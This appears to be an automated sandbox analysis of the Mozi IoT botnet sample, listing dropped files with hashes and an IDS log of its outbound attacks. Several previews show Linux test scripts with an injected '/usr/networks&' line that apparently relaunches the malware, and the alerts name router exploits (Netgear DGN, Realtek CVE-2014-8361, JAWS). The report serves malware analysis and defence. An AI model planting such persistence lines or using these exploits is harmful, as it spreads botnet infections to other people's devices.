                                                              Preview:./usr/networks&.exitcode=1..# Kselftest framework requirement - SKIP code is 4..ksft_skip=4..#.# Static templates for performance, stressing and smoke tests..# Also it is possible to pass any supported parameters manualy..#.PERF_PARAM="single_cpu_test=1 sequential_test_order=1 test_repeat_count=3".SMOKE_PARAM="single_cpu_test=1 test_loop_count=10000 test_repeat_count=10".STRESS_PARAM="test_repeat_count=20"..check_test_requirements().{..uid=$(id -u)..if [ $uid -ne 0 ]; then...echo "$0: Must be run as root"...exit $ksft_skip..fi...if ! which modprobe > /dev/null 2>&1; then...echo "$0: You need modprobe installed"...exit $ksft_skip..fi...if ! modinfo $DRIVER > /dev/null 2>&1; then...echo "$0: You must have the following enabled in your kernel:"...echo "CONFIG_TEST_VMALLOC=m"...exit $ksft_skip..fi.}..run_perfformance_check().{..echo "Run performance tests to evaluate how fast vmalloc allocation is."..echo "It runs all test cases on one single CPU with sequential order."...modprobe $DRIVER
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):46
                                                              Entropy (8bit):3.925523369006428
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                              MD5:2CADDA792FBD37B54978108B6CC504D4
                                                              SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                              SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                              SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):59
                                                              Entropy (8bit):4.140763389477654
                                                              Encrypted:false
                                                              SSDEEP:3:qXVasWoWbPDXVOORgn:6W9Mn
                                                              MD5:0A5C7A75059C630EEFC22C6F180442A8
                                                              SHA1:D8EB51C2C827DA1D4F2A859EF36F294D1AF38842
                                                              SHA-256:7657F8B81C1CFB82399BB4E53F4F23EDC7E0F2F281F4C1569DF650D731ECC4D6
                                                              SHA-512:214F4D17D813CA80185D1535D611CAE7A1B2DCD0AD9D09C1B2E01D882C6B752CAE6AB5AD96C36E1B5B2236EC3540A1537B818C726BD1C92B9419BAE087EE0825
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):4118
                                                              Entropy (8bit):5.170223934018025
                                                              Encrypted:false
                                                              SSDEEP:48:M5oJmTjrAeHf8ylJL+sh6EZrbMAQ25JN7i8DmLBsxCkxCX09doiqKdCF7C9Y:6/AeHfzDysp4oGVe9lo
                                                              MD5:BEFDF35EDFCAFA649407CD9A390F725B
                                                              SHA1:64FCBBEFD1DB4496C1A69EBF6A27918FA8989543
                                                              SHA-256:D9786D0B311044F9D317FACECE2CEA5A4A28B4E89EABA344F55ABD9142D14A94
                                                              SHA-512:08AFF2F22DCDE9B948841CCC6B9544A041E602F3B6D01C0D2E9E3D9920FB81AB015C557928FF53CD4A1E9E9D729C7F62D1E8FF5BE057593FBFC322F7408D5CE9
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit $ksft_skip..fi.}..zram_cleanup().{..echo "zram cleanup"..local i=..for i in $(seq 0 $dev_makeswap); do...swapoff /dev/zram$i..done...for i in $(seq 0 $dev_mounted); do...umount /dev/zram$i..done...for i in $(seq 0 $(($dev_num - 1))); do...echo 1 > /sys/block/zram${i}/reset...rm -rf zram$i..done..}..zram_unload().{..if [ $MODULE -ne 0 ] ; then...echo "zram rmmod zram"...rmmod zram > /dev/null 2>&1..fi.}..zram_load().{..# check zram module exists..MODULE_PATH=/lib/modules/`uname -r`/kernel/drivers/block/zram/zram.ko..if [ -f $MODULE_PATH ]; then...MODULE=1...echo "create '$dev_num' zram device(s)"...modprobe zram num_devices=$dev_num...if [ $? -ne 0 ]; then....echo "failed to insert zram module"....exit 1...fi....dev_num_created=$(ls /dev/zram* | wc -w)....if [ "$dev_num_created" -ne "$dev_num" ]; then....echo "unexpected num of devices: $dev_num_created"....ERR_CODE=-1...else....echo "zram load module successful"...fi..elif [ -b /dev/zram0 ]; then...echo "/dev/zra
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):53
                                                              Entropy (8bit):4.011057842116201
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORT0DAvSQ8OORgn:bDA64n
                                                              MD5:9AD83E837CC1DEF0B2E4172E1D4A59DA
                                                              SHA1:A9D8A337A3BC32D9BC15A5FD8A8B5932F33B3B82
                                                              SHA-256:34BB767768F1C4420BF0B7A20F1EBF372F2A428B9096D633E41931768A409C76
                                                              SHA-512:6185BCB8BF8D6F340516719576C79D6C0854589CBABDCB213AFF58C18EF4F43B00E811364782554DA418E732AA1918C7F361E6FD99AE5FFBDB7471AB328F05DD
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $retcode../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):5016
                                                              Entropy (8bit):4.970509239077376
                                                              Encrypted:false
                                                              SSDEEP:96:cYLZoIK9jKurJp8F6Wx0MpwWG77dkHFMK:cAZor7JM6lM+h7dot
                                                              MD5:8878C23009543D7C0A3502AAC9BB947B
                                                              SHA1:228AB7C7586B65B59B7C226D70AFE69FB83FC41B
                                                              SHA-256:23569BBDA3A6391C7E40DC42AD2270960473BD136D19405A76717DD24CF99C42
                                                              SHA-512:014DFBF6C8FA4CD797162842D90697F1ABCC568CA8C35B1C70480B568E116858DBA280DA74D23FD38FB9CA9627970D7EE3AD1D6C50B5952EEE598E0B39F566D6
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1. fi.}..ARGS="$*"..if [ "$ARGS" = "" ];.then. ARGS="$TYPES".fi..# FIXME use /sys/bus/usb/device/$THIS/bConfigurationValue to.# check and change configs..CONFIG=''..check_config ().{. if [ "$CONFIG" = "" ]; then..CONFIG=$1..echo "assuming $CONFIG configuration"..return. fi. if [ "$CONFIG" = $1 ]; then..return. fi.. echo "** device must be in $1 config, but it's $CONFIG instead". exit 1.}...echo "TESTING: $ARGS"..while : true.do. echo $(date).. for TYPE in $ARGS. do..# restore defaults..COUNT=5000..BUFLEN=2048...# FIXME automatically multiply COUNT by 10 when..# /sys/bus/usb/device/$THIS/speed == "480"..#.COUNT=50000...case $TYPE in..control).. # any device, in any configuration, can use this... echo '** Control test cases:'... echo "test 9: ch9 postconfig".. do_test -t 9 -c 5000.. echo "test 10: control queueing".. do_test -t 10 -c 5000... # this relies on some vendor-specific commands.. echo "test 14: cont
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3727
                                                              Entropy (8bit):5.173614270314125
                                                              Encrypted:false
                                                              SSDEEP:96:ikBNTBboQTybFowKrzmPJwTMpVV0nWFmV:ThBObFowAKV0nW8V
                                                              MD5:ACEA76BAB838D1B0C3D06CF885406B13
                                                              SHA1:DC0ED416D3C675534359EB23FFC3B96C6D72399F
                                                              SHA-256:0E04100CC3B1902652984B7DE012464A09CAF917D66BB1479D7E0A12101CB140
                                                              SHA-512:A196E0B4E93AC95C63CE04EB588532F1181B6DA45026A8ADFC9EA94C6CC52B9BAC0C6C8C39512F124C383FFA7D9C487BCC8D5A4DE6172962C1DAA5BA72399963
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..fi.}..do_slabs_plotting().{..local file=$1..local out_file..local range="every ::$xmin"..local xtic=""..local xtic_rotate="norotate"..local lines=2000000..local wc_lines...check_file_exist "$file"...out_file=`basename "$file"`..if [ $xmax -ne 0 ]; then...range="$range::$xmax"...lines=$((xmax-xmin))..fi...wc_lines=`cat "$file" | wc -l`..if [ $? -ne 0 ] || [ "$wc_lines" -eq 0 ] ; then...wc_lines=$lines..fi...if [ "$wc_lines" -lt "$lines" ]; then...lines=$wc_lines..fi...if [ $((width / lines)) -gt $min_slab_name_size ]; then...xtic=":xtic(1)"...xtic_rotate=90..fi..gnuplot -p << EOF.#!/usr/bin/env gnuplot..set terminal png enhanced size $width,$height large.set output '$out_file.png'.set autoscale xy.set xlabel 'samples'.set ylabel 'bytes'.set style histogram columnstacked title textcolor lt -1.set style fill solid 0.15.set xtics rotate $xtic_rotate.set key left above Left title reverse..plot "$file" $range u 2$xtic title 'SIZE' with boxes,\..'' $range u 3 title '
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):4209
                                                              Entropy (8bit):5.076972113432996
                                                              Encrypted:false
                                                              SSDEEP:96:7clfSyzEmuUySne6nAZAT2AGzExXvGcufeB:IRSyzEH5SeduTdKExXvGcTB
                                                              MD5:DC3C3E6F1C9C8CE13C5B08B389C754EB
                                                              SHA1:E5104480B29198B150A9D85B4DDFC61174766421
                                                              SHA-256:31B786EFA295D001CA8D161307A9AC0B01C609070E94D1479F88403F484AC389
                                                              SHA-512:62FA97616A3FF0FD732924EDF8D736F733DBAFEC640E60B988F7A6E8587838B22AB633E1190F2DC96FA00638E8A7AEBFB23F2E859CCC142DC822BFD36F64C3DE
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.}..list_header() {..:.}..header() {..printf "\n#####################\n# $1\n" >> ${output}.}..# process one directory (incl sub-directories).dir_filelist() {..${dep_list}header "$1"...srcdir=$(echo "$1" | sed -e 's://*:/:g')..dirlist=$(find "${srcdir}" -printf "%p %m %U %G\n" | LANG=C sort)...# If $dirlist is only one line, then the directory is empty..if [ "$(echo "${dirlist}" | wc -l)" -gt 1 ]; then...${dep_list}print_mtime "$1"....echo "${dirlist}" | \...while read x; do....${dep_list}parse ${x}...done..fi.}..# if only one file is specified and it is .cpio file then use it direct as fs.# if a directory is specified then add all files in given direcotry to fs.# if a regular file is specified assume it is in gen_initramfs format.input_file() {..source="$1"..if [ -f "$1" ]; then...${dep_list}header "$1"...is_cpio="$(echo "$1" | sed 's/^.*\.cpio\(\..*\)\{0,1\}/cpio/')"...if [ $2 -eq 0 -a ${is_cpio} = "cpio" ]; then....cpio_file=$1....echo "$1" | grep -q '^.*\.cp
                                                              File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, missing section headers at 307920
                                                              Entropy (8bit):5.824683494234165
                                                              TrID:
                                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                              File name:Mozi.m.elf
                                                              File size:307'200 bytes
                                                              MD5:9bc075b91bc1088c6e230facc6510824
                                                              SHA1:45e936d0278b04663b9375337b2d21afb44c361f
                                                              SHA256:18e3658c5f62ef2fcd76b0ec25243d979741bf640a76513f121b40a83399a511
                                                              SHA512:036b280a052e19cc5b64b43957b157210814c37c867e1480cce61c9f955d04f341c0001de88752083025f89f07d3147ff6cb65670e9e20291f628d1eb883debb
                                                              SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ7:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBf
                                                              TLSH:47643A8AFD81AE25D5C122BBFE2F428A331317B8D2EB71129D145F2476CA94F0F7A541
                                                              File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S
                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-12-11T00:42:57.848142+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234790213.239.19.8680TCP
                                                              2024-12-11T00:42:58.247209+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350400216.18.254.1618080TCP
                                                              2024-12-11T00:42:58.479152+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235894087.120.225.1175555TCP
                                                              2024-12-11T00:42:58.759121+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350214125.133.16.2749152TCP
                                                              2024-12-11T00:43:00.962824+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353258163.152.100.2580TCP
                                                              2024-12-11T00:43:06.285504+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234627076.227.143.21549152TCP
                                                              2024-12-11T00:43:06.285876+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2345140124.39.196.188080TCP
                                                              2024-12-11T00:43:06.286241+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235168254.78.250.895555TCP
                                                              2024-12-11T00:43:06.286607+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359228123.175.241.12549152TCP
                                                              2024-12-11T00:43:06.321711+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234664034.136.79.417574TCP
                                                              2024-12-11T00:43:06.322100+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348522178.51.3.12880TCP
                                                              2024-12-11T00:43:06.322839+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341912152.158.234.1980TCP
                                                              2024-12-11T00:43:06.391167+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2342494221.40.54.22180TCP
                                                              2024-12-11T00:43:07.245978+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340994134.220.93.1115555TCP
                                                              2024-12-11T00:43:07.285314+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234215471.44.225.11280TCP
                                                              2024-12-11T00:43:07.285697+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235897279.39.229.2552869TCP
                                                              2024-12-11T00:43:07.286052+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235928431.20.181.4852869TCP
                                                              2024-12-11T00:43:07.286423+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233503861.237.100.818080TCP
                                                              2024-12-11T00:43:07.286788+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233387048.214.85.135555TCP
                                                              2024-12-11T00:43:07.287143+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2345240161.199.124.14552869TCP
                                                              2024-12-11T00:43:07.287875+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235488023.173.106.2780TCP
                                                              2024-12-11T00:43:07.288236+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349094192.135.140.13580TCP
                                                              2024-12-11T00:43:07.288595+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354774204.81.207.1888080TCP
                                                              2024-12-11T00:43:07.288959+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360168220.15.89.1080TCP
                                                              2024-12-11T00:43:07.289690+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338010221.42.76.517574TCP
                                                              2024-12-11T00:43:07.290045+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234401279.10.209.3449152TCP
                                                              2024-12-11T00:43:07.290406+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23552649.58.179.10980TCP
                                                              2024-12-11T00:43:07.290776+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235820229.105.29.15980TCP
                                                              2024-12-11T00:43:07.291131+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346432203.29.198.2087574TCP
                                                              2024-12-11T00:43:07.292231+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351378113.145.142.2028080TCP
                                                              2024-12-11T00:43:07.293673+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360422184.96.7.288080TCP
                                                              2024-12-11T00:43:07.294045+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23406309.109.75.1278080TCP
                                                              2024-12-11T00:43:07.294448+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347894206.142.193.1527574TCP
                                                              2024-12-11T00:43:07.294765+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235642447.30.123.2128080TCP
                                                              2024-12-11T00:43:07.295525+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344964153.95.193.1215555TCP
                                                              2024-12-11T00:43:07.295856+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233863256.53.8.680TCP
                                                              2024-12-11T00:43:07.296583+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334024193.94.36.4380TCP
                                                              2024-12-11T00:43:07.296583+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334024193.94.36.4380TCP
                                                              2024-12-11T00:43:07.297669+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234821893.31.4.22549152TCP
                                                              2024-12-11T00:43:07.298038+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343226206.130.7.228080TCP
                                                              2024-12-11T00:43:07.298436+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339352222.38.112.22880TCP
                                                              2024-12-11T00:43:07.299493+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354806143.186.21.17380TCP
                                                              2024-12-11T00:43:07.300575+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348516186.251.44.2095555TCP
                                                              2024-12-11T00:43:07.300939+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342356166.192.145.3949152TCP
                                                              2024-12-11T00:43:07.301306+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2338568211.70.46.518080TCP
                                                              2024-12-11T00:43:07.302397+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234299414.232.148.19380TCP
                                                              2024-12-11T00:43:07.302758+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353384162.198.43.2278080TCP
                                                              2024-12-11T00:43:07.303115+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355738154.140.14.680TCP
                                                              2024-12-11T00:43:07.303115+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355738154.140.14.680TCP
                                                              2024-12-11T00:43:07.303529+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354192186.173.246.16480TCP
                                                              2024-12-11T00:43:07.303529+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354192186.173.246.16480TCP
                                                              2024-12-11T00:43:07.304205+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235933634.57.137.15380TCP
                                                              2024-12-11T00:43:07.304934+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352520140.9.134.1335555TCP
                                                              2024-12-11T00:43:07.305302+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234867640.223.116.25480TCP
                                                              2024-12-11T00:43:07.305659+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233406616.29.234.24480TCP
                                                              2024-12-11T00:43:07.305659+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233406616.29.234.24480TCP
                                                              2024-12-11T00:43:07.306027+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354080110.142.198.15849152TCP
                                                              2024-12-11T00:43:07.308211+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234540450.91.199.949152TCP
                                                              2024-12-11T00:43:07.308601+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341280215.50.246.238080TCP
                                                              2024-12-11T00:43:07.309294+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2341766179.117.226.19480TCP
                                                              2024-12-11T00:43:07.309654+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234297490.197.2.275555TCP
                                                              2024-12-11T00:43:07.310378+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23462529.70.45.22749152TCP
                                                              2024-12-11T00:43:07.310747+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343262113.146.56.7949152TCP
                                                              2024-12-11T00:43:07.311111+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342856108.85.179.16049152TCP
                                                              2024-12-11T00:43:07.311481+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2333938202.202.168.648080TCP
                                                              2024-12-11T00:43:07.312203+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233731447.69.248.1249152TCP
                                                              2024-12-11T00:43:07.313335+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358324201.200.12.1167574TCP
                                                              2024-12-11T00:43:07.314019+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235772865.131.166.13049152TCP
                                                              2024-12-11T00:43:07.314382+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235012632.170.33.25349152TCP
                                                              2024-12-11T00:43:07.314743+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235225845.27.188.997574TCP
                                                              2024-12-11T00:43:07.315110+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344056191.251.39.308080TCP
                                                              2024-12-11T00:43:07.316938+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352166157.149.9.225555TCP
                                                              2024-12-11T00:43:07.317309+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234613476.51.22.345555TCP
                                                              2024-12-11T00:43:07.318398+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333290214.156.186.645555TCP
                                                              2024-12-11T00:43:07.318776+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337392207.198.77.4580TCP
                                                              2024-12-11T00:43:07.319547+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234765630.227.89.815555TCP
                                                              2024-12-11T00:43:07.320238+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23450003.254.159.1817574TCP
                                                              2024-12-11T00:43:07.321717+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359380212.148.153.19280TCP
                                                              2024-12-11T00:43:07.322123+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350500215.47.78.2267574TCP
                                                              2024-12-11T00:43:07.322448+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234761038.95.163.20580TCP
                                                              2024-12-11T00:43:07.322448+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234761038.95.163.20580TCP
                                                              2024-12-11T00:43:07.323554+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235657865.143.55.17549152TCP
                                                              2024-12-11T00:43:07.323911+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334192121.19.25.7649152TCP
                                                              2024-12-11T00:43:07.324653+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234825851.217.212.9152869TCP
                                                              2024-12-11T00:43:07.325038+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2354768171.2.151.10880TCP
                                                              2024-12-11T00:43:07.325757+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337292149.210.29.20180TCP
                                                              2024-12-11T00:43:07.326866+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233903261.2.36.4852869TCP
                                                              2024-12-11T00:43:07.327251+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2357932101.125.216.15152869TCP
                                                              2024-12-11T00:43:07.327609+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358674163.115.127.19180TCP
                                                              2024-12-11T00:43:07.328376+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354190131.214.104.2157574TCP
